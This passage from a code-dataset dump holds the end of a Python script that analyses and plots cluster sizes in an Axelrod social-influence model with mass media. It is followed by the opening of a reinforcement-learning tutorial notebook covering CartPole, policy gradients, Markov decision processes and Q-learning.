nkyos\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport pickle as pkl\r\nfrom numba import njit\r\nfrom scipy.ndimage import measurements as meas\r\nimport os\r\nimport re\r\nimport matplotlib.pyplot as plt\r\n\r\n#Returns a colored grid\r\ndef color(dim, data, L, imageName, save=False):\r\n \r\n # turn feature arrays to single values\r\n Matrix = njit_labelGrid(dim, data, L)\r\n FlippedMatrix = np.flip(Matrix, 0)\r\n \r\n # plot\r\n fig, ax = plt.subplots() # delete after\r\n xi = np.arange(0, dim+1)\r\n yi = np.arange(0, dim+1)\r\n X, Y = np.meshgrid(xi, yi)\r\n ax.pcolormesh(X, Y, FlippedMatrix)\r\n # plt.pcolormesh(FlippedMatrix, edgecolors=\"w\")\r\n ax.set_aspect('equal')\r\n plt.axis('off')\r\n # plt.title('Stable State of Social Influence Model')\r\n if save:\r\n plt.savefig(imageName)\r\n plt.close()\r\n \r\n\r\n@njit\r\ndef njit_labelGrid(dim, data, L):\r\n \r\n Matrix = np.zeros((dim, dim), dtype = np.uint32)\r\n labels = np.arange(1, Matrix.size + 1)\r\n np.random.shuffle(labels)\r\n \r\n for row in range (0,dim):\r\n for col in range(0,dim):\r\n if row == 0 and col == 0:\r\n stableRegions = data[row,col].copy().reshape(1, -1)\r\n else:\r\n arr_in_regions = False\r\n for r in range(stableRegions.shape[0]):\r\n elems_same = 0\r\n for feat in range(stableRegions[r,:].size):\r\n if data[row,col,feat] == stableRegions[r, feat]:\r\n elems_same += 1\r\n if elems_same == L:\r\n arr_in_regions = True\r\n if ~arr_in_regions:\r\n stableRegions = 
np.concatenate((stableRegions, data[row, col].reshape(1, -1)))\r\n \r\n for row in range (0, dim):\r\n for col in range(0, dim):\r\n for r in range(stableRegions.shape[0]):\r\n elems_same = 0\r\n for feat in range(stableRegions[r,:].size):\r\n if data[row,col,feat] == stableRegions[r, feat]:\r\n elems_same += 1\r\n if elems_same == L:\r\n Matrix[row,col] = labels[r]\r\n \r\n return Matrix\r\n\r\n\r\ndef analyzeClusters(dim, data, L):\r\n '''\r\n returns the biggest cluster size (normalised) and the number of clusters\r\n '''\r\n\r\n \r\n # turn feature arrays to single values\r\n Matrix = njit_labelGrid(dim, data, L)\r\n \r\n # get number of clusters\r\n labels = np.unique(Matrix)\r\n num_clusters = len(labels)\r\n \r\n # get cluster sizes \r\n clusters_sizes = np.zeros(len(labels), dtype = np.uint32)\r\n \r\n for ilab, lab in enumerate(labels):\r\n z = (Matrix == lab)\r\n lw, _ = meas.label(z) \r\n area = meas.sum(z, lw, index=np.arange(lw.max() + 1))\r\n clusters_sizes[ilab] = np.max(area)\r\n \r\n # get top 1 cluster size\r\n # N = dim**2\r\n # norm_clusters_sizes = [i / N for i in clusters_sizes] # normalise sizes\r\n # g = np.sort(norm_clusters_sizes)[::-1][0] \r\n \r\n g = np.sort(clusters_sizes)[::-1][0] # normalise after you average!\r\n \r\n return g, num_clusters\r\n \r\n\r\n# -- 1 \r\n \r\n\r\nfolder = 'Part 1 Results - Runs No3' \r\nsubfolder = '5F50dim1media0.0005B'\r\npath = os.path.join(folder, subfolder)\r\n\r\nL = int(re.search('(.*)F', subfolder).group(1))\r\ndim = int(re.search('F(.*)dim', subfolder).group(1))\r\nN = dim*dim\r\nmedia = int(re.search('dim(.*)media', subfolder).group(1))\r\nB = float(re.search('a(.*)B', subfolder).group(1))\r\nTs = [2,5,10,15,20,25,30,35,40,45,50]\r\n\r\n\r\nresults = np.zeros((len(Ts), 2)) \r\n\r\nfor iT, T in enumerate(Ts):\r\n \r\n num_files = 0\r\n avg_sg = 0\r\n for folder in os.listdir(path):\r\n sub_path = os.path.join(path, folder)\r\n if os.path.isdir(sub_path): \r\n for file in os.listdir(sub_path):\r\n if (('finalMap' in file) and ('.pkl' in file)):\r\n if T == int(re.search('F(.*)Q', file).group(1)):\r\n \r\n print(file)\r\n num_files += 1\r\n # T = int(re.search('F(.*)Q', file).group(1))\r\n \r\n filepath = os.path.join(sub_path, file)\r\n with open(filepath, 'rb') as f:\r\n mat = pkl.load(f)\r\n \r\n _, ng = analyzeClusters(dim, mat, L)\r\n \r\n imagePath = os.path.join(sub_path, file[:-4].replace('.',','))\r\n # color(dim, mat, L, imagePath, save=True)\r\n \r\n avg_sg += ng\r\n \r\n mean_q = (avg_sg/num_files) / N if num_files > 0 else 0 \r\n results[iT, :] = [T, mean_q] \r\n \r\n \r\n# ----- 2/3/4\r\n\r\n\r\nfolder = 'Part 1 Results - Runs No3' \r\n# subfolder = '5F50dim2media0.0005B' # missing 5 :(\r\n# subfolder = '5F50dim1media0.6B' # missing one\r\n# subfolder = '5F50dim2media0.1B' # not missing any\r\npath = os.path.join(folder, subfolder)\r\n\r\nL = int(re.search('(.*)F', subfolder).group(1))\r\ndim = int(re.search('F(.*)dim', subfolder).group(1))\r\nN = dim*dim\r\nmedia = int(re.search('dim(.*)media', subfolder).group(1))\r\nB = float(re.search('a(.*)B', subfolder).group(1))\r\nTs = [2,5,10,15,20,25,30,35,40,45,50]\r\n\r\n\r\nresults = np.zeros((len(Ts), 2)) \r\n\r\nfor iT, T in enumerate(Ts):\r\n \r\n num_files = 0\r\n avg_sg = 0\r\n for folder in os.listdir(path):\r\n sub_path = os.path.join(path, folder)\r\n if os.path.isdir(sub_path): \r\n for file in os.listdir(sub_path):\r\n if (('finalMap' in file) and ('.pkl' in file)):\r\n if T == int(re.search('F(.*)Q', file).group(1)):\r\n \r\n print(file)\r\n num_files += 
1\r\n # T = int(re.search('F(.*)Q', file).group(1))\r\n \r\n filepath = os.path.join(sub_path, file)\r\n with open(filepath, 'rb') as f:\r\n mat = pkl.load(f)\r\n \r\n _, ng = analyzeClusters(dim, mat, L)\r\n \r\n imagePath = os.path.join(sub_path, file[:-4].replace('.',','))\r\n # color(dim, mat, L, imagePath, save=True)\r\n \r\n avg_sg += ng\r\n \r\n mean_q = (avg_sg/num_files) / N if num_files > 0 else 0 \r\n results[iT, :] = [T, mean_q] \r\n \r\n \r\n# ------ plot g vs q\r\n\r\n\r\nfigname = path + '.png'\r\nfigpath = os.path.join(path, figname)\r\nfig, ax1 = plt.subplots()\r\n\r\ncolor1 = 'black'\r\nlab1 = r'$\\langle S_{max} \\rangle / N $'\r\nax1.plot(results[:,0], results[:,1], marker = 'o', color=color1)\r\n\r\nax1.set_xlabel(r'$q$')\r\nax1.set_ylabel(lab1)\r\n# ax1.tick_params(axis='y')\r\n\r\nfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n# plt.savefig(figpath, dpi=400)\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n\r\n \r\n\r\n\r\n","repo_name":"nicoleta-kyo/Axelrod-Model-Mass-Media","sub_path":"code/make_color_graph_gvsq_ALL.py","file_name":"make_color_graph_gvsq_ALL.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43891259321","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# **Chapter 18 – Reinforcement Learning**\n\n# _This notebook contains all the sample code in chapter 18_.\n\n# \n# \n#
    \n# Run in Google Colab\n#
    \n\n# # Setup\n\n# First, let's import a few common modules, ensure MatplotLib plots figures inline and prepare a function to save the figures. We also check that Python 3.5 or later is installed (although Python 2.x may work, it is deprecated so we strongly recommend you use Python 3 instead), as well as Scikit-Learn ≥0.20 and TensorFlow ≥2.0.\n\n# In[1]:\n\n\n# Python ≥3.5 is required\nimport sys\nassert sys.version_info >= (3, 5)\n\n# Scikit-Learn ≥0.20 is required\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\ntry:\n # %tensorflow_version only exists in Colab.\n get_ipython().run_line_magic('tensorflow_version', '2.x')\n get_ipython().system('apt update && apt install -y libpq-dev libsdl2-dev swig xorg-dev xvfb')\n get_ipython().system('pip install -q -U tf-agents-nightly pyvirtualdisplay gym[atari]')\n IS_COLAB = True\nexcept Exception:\n IS_COLAB = False\n\n# TensorFlow ≥2.0 is required\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\nif not tf.test.is_gpu_available():\n print(\"No GPU was detected. CNNs can be very slow without a GPU.\")\n if IS_COLAB:\n print(\"Go to Runtime > Change runtime and select a GPU hardware accelerator.\")\n\n# Common imports\nimport numpy as np\nimport os\n\n# to make this notebook's output stable across runs\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# To plot pretty figures\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# To get smooth animations\nimport matplotlib.animation as animation\nmpl.rc('animation', html='jshtml')\n\n# Where to save the figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"rl\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\n# # Introduction to OpenAI gym\n\n# In this notebook we will be using [OpenAI gym](https://gym.openai.com/), a great toolkit for developing and comparing Reinforcement Learning algorithms. It provides many environments for your learning *agents* to interact with. Let's start by importing `gym`:\n\n# In[2]:\n\n\nimport gym\n\n\n# Let's list all the available environments:\n\n# In[3]:\n\n\ngym.envs.registry.all()\n\n\n# The Cart-Pole is a very simple environment composed of a cart that can move left or right, and pole placed vertically on top of it. The agent must move the cart left or right to keep the pole upright.\n\n# In[4]:\n\n\nenv = gym.make('CartPole-v1')\n\n\n# Let's initialize the environment by calling is `reset()` method. This returns an observation:\n\n# In[5]:\n\n\nenv.seed(42)\nobs = env.reset()\n\n\n# Observations vary depending on the environment. 
In this case it is a 1D NumPy array composed of 4 floats: they represent the cart's horizontal position, its velocity, the angle of the pole (0 = vertical), and the angular velocity.\n\n# In[6]:\n\n\nobs\n\n\n# An environment can be visualized by calling its `render()` method, and you can pick the rendering mode (the rendering options depend on the environment).\n\n# **Warning**: some environments (including the Cart-Pole) require access to your display, which opens up a separate window, even if you specify `mode=\"rgb_array\"`. In general you can safely ignore that window. However, if Jupyter is running on a headless server (ie. without a screen) it will raise an exception. One way to avoid this is to install a fake X server like [Xvfb](http://en.wikipedia.org/wiki/Xvfb). On Debian or Ubuntu:\n# \n# ```bash\n# $ apt update\n# $ apt install -y xvfb\n# ```\n# \n# You can then start Jupyter using the `xvfb-run` command:\n# \n# ```bash\n# $ xvfb-run -s \"-screen 0 1400x900x24\" jupyter notebook\n# ```\n# \n# Alternatively, you can install the [pyvirtualdisplay](https://github.com/ponty/pyvirtualdisplay) Python library which wraps Xvfb:\n# \n# ```bash\n# python3 -m pip install -U pyvirtualdisplay\n# ```\n# \n# And run the following code:\n\n# In[7]:\n\n\ntry:\n import pyvirtualdisplay\n display = pyvirtualdisplay.Display(visible=0, size=(1400, 900)).start()\nexcept ImportError:\n pass\n\n\n# In[8]:\n\n\nenv.render()\n\n\n# In this example we will set `mode=\"rgb_array\"` to get an image of the environment as a NumPy array:\n\n# In[9]:\n\n\nimg = env.render(mode=\"rgb_array\")\nimg.shape\n\n\n# In[10]:\n\n\ndef plot_environment(env, figsize=(5,4)):\n plt.figure(figsize=figsize)\n img = env.render(mode=\"rgb_array\")\n plt.imshow(img)\n plt.axis(\"off\")\n return img\n\n\n# In[11]:\n\n\nplot_environment(env)\nplt.show()\n\n\n# Let's see how to interact with an environment. Your agent will need to select an action from an \"action space\" (the set of possible actions). Let's see what this environment's action space looks like:\n\n# In[12]:\n\n\nenv.action_space\n\n\n# Yep, just two possible actions: accelerate towards the left or towards the right.\n\n# Since the pole is leaning toward the right (`obs[2] > 0`), let's accelerate the cart toward the right:\n\n# In[13]:\n\n\naction = 1 # accelerate right\nobs, reward, done, info = env.step(action)\nobs\n\n\n# Notice that the cart is now moving toward the right (`obs[1] > 0`). The pole is still tilted toward the right (`obs[2] > 0`), but its angular velocity is now negative (`obs[3] < 0`), so it will likely be tilted toward the left after the next step.\n\n# In[14]:\n\n\nplot_environment(env)\nsave_fig(\"cart_pole_plot\")\n\n\n# Looks like it's doing what we're telling it to do!\n\n# The environment also tells the agent how much reward it got during the last step:\n\n# In[15]:\n\n\nreward\n\n\n# When the game is over, the environment returns `done=True`:\n\n# In[16]:\n\n\ndone\n\n\n# Finally, `info` is an environment-specific dictionary that can provide some extra information that you may find useful for debugging or for training. For example, in some games it may indicate how many lives the agent has.\n\n# In[17]:\n\n\ninfo\n\n\n# The sequence of steps between the moment the environment is reset until it is done is called an \"episode\". 
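# As an aside (a sketch, not one of the book's cells): a minimal episode loop
# with a purely random policy looks like this, accumulating the reward until
# `step()` reports that the episode is done:

import gym

demo_env = gym.make("CartPole-v1")  # same environment as above
obs = demo_env.reset()
episode_reward = 0.0
done = False
while not done:
    # sample a random action from the action space and apply it
    obs, reward, done, info = demo_env.step(demo_env.action_space.sample())
    episode_reward += reward
demo_env.close()
print("episode reward:", episode_reward)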
At the end of an episode (i.e., when `step()` returns `done=True`), you should reset the environment before you continue to use it.\n\n# In[18]:\n\n\nif done:\n obs = env.reset()\n\n\n# Now how can we make the poll remain upright? We will need to define a _policy_ for that. This is the strategy that the agent will use to select an action at each step. It can use all the past actions and observations to decide what to do.\n\n# # A simple hard-coded policy\n\n# Let's hard code a simple strategy: if the pole is tilting to the left, then push the cart to the left, and _vice versa_. Let's see if that works:\n\n# In[19]:\n\n\nenv.seed(42)\n\ndef basic_policy(obs):\n angle = obs[2]\n return 0 if angle < 0 else 1\n\ntotals = []\nfor episode in range(500):\n episode_rewards = 0\n obs = env.reset()\n for step in range(200):\n action = basic_policy(obs)\n obs, reward, done, info = env.step(action)\n episode_rewards += reward\n if done:\n break\n totals.append(episode_rewards)\n\n\n# In[20]:\n\n\nnp.mean(totals), np.std(totals), np.min(totals), np.max(totals)\n\n\n# Well, as expected, this strategy is a bit too basic: the best it did was to keep the poll up for only 68 steps. This environment is considered solved when the agent keeps the poll up for 200 steps.\n\n# Let's visualize one episode:\n\n# In[21]:\n\n\nenv.seed(42)\n\nframes = []\n\nobs = env.reset()\nfor step in range(200):\n img = env.render(mode=\"rgb_array\")\n frames.append(img)\n action = basic_policy(obs)\n\n obs, reward, done, info = env.step(action)\n if done:\n break\n\n\n# Now show the animation:\n\n# In[22]:\n\n\ndef update_scene(num, frames, patch):\n patch.set_data(frames[num])\n return patch,\n\ndef plot_animation(frames, repeat=False, interval=40):\n fig = plt.figure()\n patch = plt.imshow(frames[0])\n plt.axis('off')\n anim = animation.FuncAnimation(\n fig, update_scene, fargs=(frames, patch),\n frames=len(frames), repeat=repeat, interval=interval)\n plt.close()\n return anim\n\n\n# In[23]:\n\n\nplot_animation(frames)\n\n\n# Clearly the system is unstable and after just a few wobbles, the pole ends up too tilted: game over. We will need to be smarter than that!\n\n# # Neural Network Policies\n\n# Let's create a neural network that will take observations as inputs, and output the action to take for each observation. To choose an action, the network will estimate a probability for each action, then we will select an action randomly according to the estimated probabilities. In the case of the Cart-Pole environment, there are just two possible actions (left or right), so we only need one output neuron: it will output the probability `p` of the action 0 (left), and of course the probability of action 1 (right) will be `1 - p`.\n\n# In[24]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nn_inputs = 4 # == env.observation_space.shape[0]\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(5, activation=\"elu\", input_shape=[n_inputs]),\n keras.layers.Dense(1, activation=\"sigmoid\"),\n])\n\n\n# In this particular environment, the past actions and observations can safely be ignored, since each observation contains the environment's full state. If there were some hidden state then you may need to consider past actions and observations in order to try to infer the hidden state of the environment. For example, if the environment only revealed the position of the cart but not its velocity, you would have to consider not only the current observation but also the previous observation in order to estimate the current velocity. 
Another example is if the observations are noisy: you may want to use the past few observations to estimate the most likely current state. Our problem is thus as simple as can be: the current observation is noise-free and contains the environment's full state.\n\n# You may wonder why we plan to pick a random action based on the probability given by the policy network, rather than just picking the action with the highest probability. This approach lets the agent find the right balance between _exploring_ new actions and _exploiting_ the actions that are known to work well. Here's an analogy: suppose you go to a restaurant for the first time, and all the dishes look equally appealing so you randomly pick one. If it turns out to be good, you can increase the probability to order it next time, but you shouldn't increase that probability to 100%, or else you will never try out the other dishes, some of which may be even better than the one you tried.\n\n# Let's write a small function that will run the model to play one episode, and return the frames so we can display an animation:\n\n# In[25]:\n\n\ndef render_policy_net(model, n_max_steps=200, seed=42):\n frames = []\n env = gym.make(\"CartPole-v1\")\n env.seed(seed)\n np.random.seed(seed)\n obs = env.reset()\n for step in range(n_max_steps):\n frames.append(env.render(mode=\"rgb_array\"))\n left_proba = model.predict(obs.reshape(1, -1))\n action = int(np.random.rand() > left_proba)\n obs, reward, done, info = env.step(action)\n if done:\n break\n env.close()\n return frames\n\n\n# Now let's look at how well this randomly initialized policy network performs:\n\n# In[26]:\n\n\nframes = render_policy_net(model)\nplot_animation(frames)\n\n\n# Yeah... pretty bad. The neural network will have to learn to do better. First let's see if it is capable of learning the basic policy we used earlier: go left if the pole is tilting left, and go right if it is tilting right.\n\n# We can make the same net play in 50 different environments in parallel (this will give us a diverse training batch at each step), and train for 5000 iterations. We also reset environments when they are done. We train the model using a custom training loop so we can easily use the predictions at each training step to advance the environments.\n\n# In[27]:\n\n\nn_environments = 50\nn_iterations = 5000\n\nenvs = [gym.make(\"CartPole-v1\") for _ in range(n_environments)]\nfor index, env in enumerate(envs):\n env.seed(index)\nnp.random.seed(42)\nobservations = [env.reset() for env in envs]\noptimizer = keras.optimizers.RMSprop()\nloss_fn = keras.losses.binary_crossentropy\n\nfor iteration in range(n_iterations):\n # if angle < 0, we want proba(left) = 1., or else proba(left) = 0.\n target_probas = np.array([([1.] 
if obs[2] < 0 else [0.])\n for obs in observations])\n with tf.GradientTape() as tape:\n left_probas = model(np.array(observations))\n loss = tf.reduce_mean(loss_fn(target_probas, left_probas))\n print(\"\\rIteration: {}, Loss: {:.3f}\".format(iteration, loss.numpy()), end=\"\")\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n actions = (np.random.rand(n_environments, 1) > left_probas.numpy()).astype(np.int32)\n for env_index, env in enumerate(envs):\n obs, reward, done, info = env.step(actions[env_index][0])\n observations[env_index] = obs if not done else env.reset()\n\nfor env in envs:\n env.close()\n\n\n# In[28]:\n\n\nframes = render_policy_net(model)\nplot_animation(frames)\n\n\n# Looks like it learned the policy correctly. Now let's see if it can learn a better policy on its own. One that does not wobble as much.\n\n# # Policy Gradients\n\n# To train this neural network we will need to define the target probabilities `y`. If an action is good we should increase its probability, and conversely if it is bad we should reduce it. But how do we know whether an action is good or bad? The problem is that most actions have delayed effects, so when you win or lose points in an episode, it is not clear which actions contributed to this result: was it just the last action? Or the last 10? Or just one action 50 steps earlier? This is called the _credit assignment problem_.\n# \n# The _Policy Gradients_ algorithm tackles this problem by first playing multiple episodes, then making the actions in good episodes slightly more likely, while actions in bad episodes are made slightly less likely. First we play, then we go back and think about what we did.\n\n# Let's start by creating a function to play a single step using the model. We will also pretend for now that whatever action it takes is the right one, so we can compute the loss and its gradients (we will just save these gradients for now, and modify them later depending on how good or bad the action turned out to be):\n\n# In[29]:\n\n\ndef play_one_step(env, obs, model, loss_fn):\n with tf.GradientTape() as tape:\n left_proba = model(obs[np.newaxis])\n action = (tf.random.uniform([1, 1]) > left_proba)\n y_target = tf.constant([[1.]]) - tf.cast(action, tf.float32)\n loss = tf.reduce_mean(loss_fn(y_target, left_proba))\n grads = tape.gradient(loss, model.trainable_variables)\n obs, reward, done, info = env.step(int(action[0, 0].numpy()))\n return obs, reward, done, grads\n\n\n# If `left_proba` is high, then `action` will most likely be `False` (since a random number uniformally sampled between 0 and 1 will probably not be greater than `left_proba`). And `False` means 0 when you cast it to a number, so `y_target` would be equal to 1 - 0 = 1. 
In other words, we set the target to 1, meaning we pretend that the probability of going left should have been 100% (so we took the right action).\n\n# Now let's create another function that will rely on the `play_one_step()` function to play multiple episodes, returning all the rewards and gradients, for each episode and each step:\n\n# In[30]:\n\n\ndef play_multiple_episodes(env, n_episodes, n_max_steps, model, loss_fn):\n all_rewards = []\n all_grads = []\n for episode in range(n_episodes):\n current_rewards = []\n current_grads = []\n obs = env.reset()\n for step in range(n_max_steps):\n obs, reward, done, grads = play_one_step(env, obs, model, loss_fn)\n current_rewards.append(reward)\n current_grads.append(grads)\n if done:\n break\n all_rewards.append(current_rewards)\n all_grads.append(current_grads)\n return all_rewards, all_grads\n\n\n# The Policy Gradients algorithm uses the model to play the episode several times (e.g., 10 times), then it goes back and looks at all the rewards, discounts them and normalizes them. So let's create couple functions for that: the first will compute discounted rewards; the second will normalize the discounted rewards across many episodes.\n\n# In[31]:\n\n\ndef discount_rewards(rewards, discount_rate):\n discounted = np.array(rewards)\n for step in range(len(rewards) - 2, -1, -1):\n discounted[step] += discounted[step + 1] * discount_rate\n return discounted\n\ndef discount_and_normalize_rewards(all_rewards, discount_rate):\n all_discounted_rewards = [discount_rewards(rewards, discount_rate)\n for rewards in all_rewards]\n flat_rewards = np.concatenate(all_discounted_rewards)\n reward_mean = flat_rewards.mean()\n reward_std = flat_rewards.std()\n return [(discounted_rewards - reward_mean) / reward_std\n for discounted_rewards in all_discounted_rewards]\n\n\n# Say there were 3 actions, and after each action there was a reward: first 10, then 0, then -50. 
If we use a discount factor of 80%, then the 3rd action will get -50 (full credit for the last reward), but the 2nd action will only get -40 (80% credit for the last reward), and the 1st action will get 80% of -40 (-32) plus full credit for the first reward (+10), which leads to a discounted reward of -22:\n\n# In[32]:\n\n\ndiscount_rewards([10, 0, -50], discount_rate=0.8)\n\n\n# To normalize all discounted rewards across all episodes, we compute the mean and standard deviation of all the discounted rewards, and we subtract the mean from each discounted reward, and divide by the standard deviation:\n\n# In[33]:\n\n\ndiscount_and_normalize_rewards([[10, 0, -50], [10, 20]], discount_rate=0.8)\n\n\n# In[34]:\n\n\nn_iterations = 150\nn_episodes_per_update = 10\nn_max_steps = 200\ndiscount_rate = 0.95\n\n\n# In[35]:\n\n\noptimizer = keras.optimizers.Adam(lr=0.01)\nloss_fn = keras.losses.binary_crossentropy\n\n\n# In[36]:\n\n\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(5, activation=\"elu\", input_shape=[4]),\n keras.layers.Dense(1, activation=\"sigmoid\"),\n])\n\n\n# In[37]:\n\n\nenv = gym.make(\"CartPole-v1\")\nenv.seed(42);\n\nfor iteration in range(n_iterations):\n all_rewards, all_grads = play_multiple_episodes(\n env, n_episodes_per_update, n_max_steps, model, loss_fn)\n total_rewards = sum(map(sum, all_rewards)) # Not shown in the book\n print(\"\\rIteration: {}, mean rewards: {:.1f}\".format( # Not shown\n iteration, total_rewards / n_episodes_per_update), end=\"\") # Not shown\n all_final_rewards = discount_and_normalize_rewards(all_rewards,\n discount_rate)\n all_mean_grads = []\n for var_index in range(len(model.trainable_variables)):\n mean_grads = tf.reduce_mean(\n [final_reward * all_grads[episode_index][step][var_index]\n for episode_index, final_rewards in enumerate(all_final_rewards)\n for step, final_reward in enumerate(final_rewards)], axis=0)\n all_mean_grads.append(mean_grads)\n optimizer.apply_gradients(zip(all_mean_grads, model.trainable_variables))\n\nenv.close()\n\n\n# In[38]:\n\n\nframes = render_policy_net(model)\nplot_animation(frames)\n\n\n# # Markov Chains\n\n# In[39]:\n\n\nnp.random.seed(42)\n\ntransition_probabilities = [ # shape=[s, s']\n [0.7, 0.2, 0.0, 0.1], # from s0 to s0, s1, s2, s3\n [0.0, 0.0, 0.9, 0.1], # from s1 to ...\n [0.0, 1.0, 0.0, 0.0], # from s2 to ...\n [0.0, 0.0, 0.0, 1.0]] # from s3 to ...\n\nn_max_steps = 50\n\ndef print_sequence():\n current_state = 0\n print(\"States:\", end=\" \")\n for step in range(n_max_steps):\n print(current_state, end=\" \")\n if current_state == 3:\n break\n current_state = np.random.choice(range(4), p=transition_probabilities[current_state])\n else:\n print(\"...\", end=\"\")\n print()\n\nfor _ in range(10):\n print_sequence()\n\n\n# # Markov Decision Process\n\n# Let's define some transition probabilities, rewards and possible actions. 
For example, in state s0, if action a0 is chosen then with proba 0.7 we will go to state s0 with reward +10, with probability 0.3 we will go to state s1 with no reward, and with never go to state s2 (so the transition probabilities are `[0.7, 0.3, 0.0]`, and the rewards are `[+10, 0, 0]`):\n\n# In[40]:\n\n\ntransition_probabilities = [ # shape=[s, a, s']\n [[0.7, 0.3, 0.0], [1.0, 0.0, 0.0], [0.8, 0.2, 0.0]],\n [[0.0, 1.0, 0.0], None, [0.0, 0.0, 1.0]],\n [None, [0.8, 0.1, 0.1], None]]\nrewards = [ # shape=[s, a, s']\n [[+10, 0, 0], [0, 0, 0], [0, 0, 0]],\n [[0, 0, 0], [0, 0, 0], [0, 0, -50]],\n [[0, 0, 0], [+40, 0, 0], [0, 0, 0]]]\npossible_actions = [[0, 1, 2], [0, 2], [1]]\n\n\n# # Q-Value Iteration\n\n# In[41]:\n\n\nQ_values = np.full((3, 3), -np.inf) # -np.inf for impossible actions\nfor state, actions in enumerate(possible_actions):\n Q_values[state, actions] = 0.0 # for all possible actions\n\n\n# In[42]:\n\n\ngamma = 0.90 # the discount factor\n\nhistory1 = [] # Not shown in the book (for the figure below)\nfor iteration in range(50):\n Q_prev = Q_values.copy()\n history1.append(Q_prev) # Not shown\n for s in range(3):\n for a in possible_actions[s]:\n Q_values[s, a] = np.sum([\n transition_probabilities[s][a][sp]\n * (rewards[s][a][sp] + gamma * np.max(Q_prev[sp]))\n for sp in range(3)])\n\nhistory1 = np.array(history1) # Not shown\n\n\n# In[43]:\n\n\nQ_values\n\n\n# In[44]:\n\n\nnp.argmax(Q_values, axis=1)\n\n\n# The optimal policy for this MDP, when using a discount factor of 0.90, is to choose action a0 when in state s0, and choose action a0 when in state s1, and finally choose action a1 (the only possible action) when in state s2.\n\n# Let's try again with a discount factor of 0.95:\n\n# In[45]:\n\n\nQ_values = np.full((3, 3), -np.inf) # -np.inf for impossible actions\nfor state, actions in enumerate(possible_actions):\n Q_values[state, actions] = 0.0 # for all possible actions\n\n\n# In[46]:\n\n\ngamma = 0.95 # the discount factor\n\nfor iteration in range(50):\n Q_prev = Q_values.copy()\n for s in range(3):\n for a in possible_actions[s]:\n Q_values[s, a] = np.sum([\n transition_probabilities[s][a][sp]\n * (rewards[s][a][sp] + gamma * np.max(Q_prev[sp]))\n for sp in range(3)])\n\n\n# In[47]:\n\n\nQ_values\n\n\n# In[48]:\n\n\nnp.argmax(Q_values, axis=1)\n\n\n# Now the policy has changed! In state s1, we now prefer to go through the fire (choose action a2). This is because the discount factor is larger so the agent values the future more, and it is therefore ready to pay an immediate penalty in order to get more future rewards.\n\n# # Q-Learning\n\n# Q-Learning works by watching an agent play (e.g., randomly) and gradually improving its estimates of the Q-Values. Once it has accurate Q-Value estimates (or close enough), then the optimal policy consists in choosing the action that has the highest Q-Value (i.e., the greedy policy).\n\n# We will need to simulate an agent moving around in the environment, so let's define a function to perform some action and get the new state and a reward:\n\n# In[49]:\n\n\ndef step(state, action):\n probas = transition_probabilities[state][action]\n next_state = np.random.choice([0, 1, 2], p=probas)\n reward = rewards[state][action][next_state]\n return next_state, reward\n\n\n# We also need an exploration policy, which can be any policy, as long as it visits every possible state many times. 
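# (Aside, a sketch rather than the book's code: for larger state spaces a
# common alternative is an ε-greedy exploration policy, which exploits the
# current Q-Value estimates most of the time but keeps exploring with
# probability ε. It reuses the `Q_values` and `possible_actions` defined above.)

def epsilon_greedy_exploration(state, epsilon=0.1):
    # explore with probability epsilon, otherwise act greedily
    if np.random.rand() < epsilon:
        return np.random.choice(possible_actions[state])
    return np.argmax(Q_values[state])  # impossible actions stay at -inf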
We will just use a random policy, since the state space is very small:\n\n# In[50]:\n\n\ndef exploration_policy(state):\n return np.random.choice(possible_actions[state])\n\n\n# Now let's initialize the Q-Values like earlier, and run the Q-Learning algorithm:\n\n# In[51]:\n\n\nnp.random.seed(42)\n\nQ_values = np.full((3, 3), -np.inf)\nfor state, actions in enumerate(possible_actions):\n Q_values[state][actions] = 0\n\nalpha0 = 0.05 # initial learning rate\ndecay = 0.005 # learning rate decay\ngamma = 0.90 # discount factor\nstate = 0 # initial state\nhistory2 = [] # Not shown in the book\n\nfor iteration in range(10000):\n history2.append(Q_values.copy()) # Not shown\n action = exploration_policy(state)\n next_state, reward = step(state, action)\n next_value = np.max(Q_values[next_state]) # greedy policy at the next step\n alpha = alpha0 / (1 + iteration * decay)\n Q_values[state, action] *= 1 - alpha\n Q_values[state, action] += alpha * (reward + gamma * next_value)\n state = next_state\n\nhistory2 = np.array(history2) # Not shown\n\n\n# In[52]:\n\n\nQ_values\n\n\n# In[53]:\n\n\nnp.argmax(Q_values, axis=1) # optimal action for each state\n\n\n# In[54]:\n\n\ntrue_Q_value = history1[-1, 0, 0]\n\nfig, axes = plt.subplots(1, 2, figsize=(10, 4), sharey=True)\naxes[0].set_ylabel(\"Q-Value$(s_0, a_0)$\", fontsize=14)\naxes[0].set_title(\"Q-Value Iteration\", fontsize=14)\naxes[1].set_title(\"Q-Learning\", fontsize=14)\nfor ax, width, history in zip(axes, (50, 10000), (history1, history2)):\n ax.plot([0, width], [true_Q_value, true_Q_value], \"k--\")\n ax.plot(np.arange(width), history[:, 0, 0], \"b-\", linewidth=2)\n ax.set_xlabel(\"Iterations\", fontsize=14)\n ax.axis([0, width, 0, 